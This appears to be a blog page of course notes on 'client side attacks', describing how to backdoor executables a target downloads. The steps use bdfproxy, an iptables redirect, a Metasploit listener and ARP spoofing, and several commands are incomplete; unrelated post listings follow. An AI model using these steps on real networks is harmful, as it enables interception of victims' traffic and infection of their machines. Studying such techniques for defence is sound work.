CLIENT SIDE ATTACKS

Backdoor delivery method2 - backdooring exe downloads

  • Backdoor any exe the target downloads.
  • We need to be in the middle of the connection.

Install bdfproxy following the guide on the website - https://packages.debian.org/sid/all/bdfproxy/download.

https://github.com/secretsquirrel/BDFProxy - No longer update or support.

1. Set IP address in config.

leafpad /etc/bdfproxy/bdfproxy.cfg

Change the proxyMode to transparent, so the target machine has Internet connection.

Change HOST IP address in WindowsIntel section, because our target is Windows machines.

2. Start dbfproxy

bdf_proxy

I met a problem to run bdf_proxy, and the offical website(https://github.com/secretsquirrel/BDFProxy) does NOT SUPPORT this program now.

I will continue to try to solve this problem later.

3. Redirect traffic to bafoxy.

iptables -t nat -A PREROUTING -p tcp --destination-port  -j REDIRECT --to-port

4. Start listening for connections

msfconsole -r /usr/share/bdfproxy/bdf_proxy_msf_resource.rc

5. Start arp spoofing.

mitmf --arp --spoof --gateway [GATEWAY IP] --target [Target IP] -i [interface]

6. When done reset IP tables rules.

./flushiptables.sh

Ethical Hacking - GAINING ACCESS(13)的更多相关文章

  1. Ethical Hacking - GAINING ACCESS(1)

    Gaining Access Introduction Everything is a computer Two main approaches (1)Server Side Do not requi ...

  2. Ethical Hacking - GAINING ACCESS(23)

    CLIENT SIDE ATTACK - BeEF Framework Hooking targets using MITMF Tools: MITMF and BeEF Start BeEF and ...

  3. Ethical Hacking - GAINING ACCESS(22)

    CLIENT SIDE ATTACKS - BeEf Framework Browser Exploitation Framework allowing us to launch a number o ...

  4. Ethical Hacking - GAINING ACCESS(17)

    CLIENT SIDE ATTACKS - Backdooring exe' s Download an executable file first. VEIL - FRAMEWORK A backd ...

  5. Ethical Hacking - GAINING ACCESS(10)

    CLIENT SIDE ATTACKS Use if server-side attacks fail. If IP is probably useless. Require user interac ...

  6. Ethical Hacking - GAINING ACCESS(6)

    Server Side Attack Analysing scan results and exploiting target system. Go to the Analysis page and ...

  7. Ethical Hacking - GAINING ACCESS(24)

    CLIENT SIDE ATTACKS - Detecting Trojan manually or using a sandbox Analyzing trojans Check the prope ...

  8. Ethical Hacking - GAINING ACCESS(21)

    CLIENT SIDE ATTACKS - Trojan delivery method - using email spoofing Use gathered info to contract ta ...

  9. Ethical Hacking - GAINING ACCESS(20)

    CLIENT SIDE ATTACKS - Spoofing backdoor extension Change the extension of the trojan from exe to a s ...

随机推荐

  1. linux服务器安装宝塔以及一些坑

    首先在linux 下运行这一步命令yum install -y wget && wget -O install.sh http://download.bt.cn/install/ins ...

  2. C# 实现定时/循环任务

    用C#实现定时/循环任务,需要使用到Quartz,在项目的NuGet包管理中可以找到并添加.一般还会伴随安装一个Log4Net,主要用它来记录在任务执行过程中遇到的问题.这边主要是讲实现定时/循环任务 ...

  3. 三文搞懂学会Docker容器技术(上)

    1,Docker简介 1.1 Docker是什么? Docker官网: https://www.docker.com/ Docker 是一个开源的应用容器引擎,基于 Go 语言 并遵从Apache2. ...

  4. 八张图彻底了解JDK8 GC调优秘籍-附PDF下载

    目录 简介 分代垃圾回收器的内存结构 JDK8中可用的GC 打印GC信息 内存调整参数 Thread配置 通用GC参数 CMS GC G1参数 总结 简介 JVM的参数有很多很多,根据我的统计JDK8 ...

  5. Java中的I/O流全汇总,所有的I/O就一张图

    放大再看,注意视力!哈哈   一口吃不成胖子,一点一点的看: 大家都是文化人,拿图要指明出处!!!  头上↑那框,对,就是那 使用的是XMind软件画的,要源文件吗? 在这里:https://gith ...

  6. python根据列表创建文件夹,拷贝指定文件

    内容涉及:关键字定位,列表去重复,路径组装,文件夹创建,文件拷贝,字符串分割 list.txt的内容为包含关键字的文件路径,如:关键字 ’181‘ org/20190523/1/20190523201 ...

  7. ajax前后端交互原理(1)

    1.Node.js简介 1.1.前后台数据交互流程 在web开发中,我们经常听说前端和后台,他们分别是做什么具体工作的呢?他们怎样交互的呢?我们得把这些基础的问题都搞明白了,才有一个大致的学习方向,首 ...

  8. 机器学习之KNN算法(分类)

    KNN算法是解决分类问题的最简单的算法.同时也是最常用的算法.KNN算法也可以称作k近邻算法,是指K个最近的数据集,属于监督学习算法. 开发流程: 1.加载数据,加载成特征矩阵X与目标向量Y. 2.给 ...

  9. Python-使用tkinter实现的Django服务进程管理工具

    import tkinter import subprocess import os import time import re import sys from tkinter import Labe ...

  10. mongodb 3.x以上版本与mongodb 2.x版本语法区别

    2.x const MongoClient = require('mongodb').MongoClient; const url = 'mongodb://localhost:27017/test' ...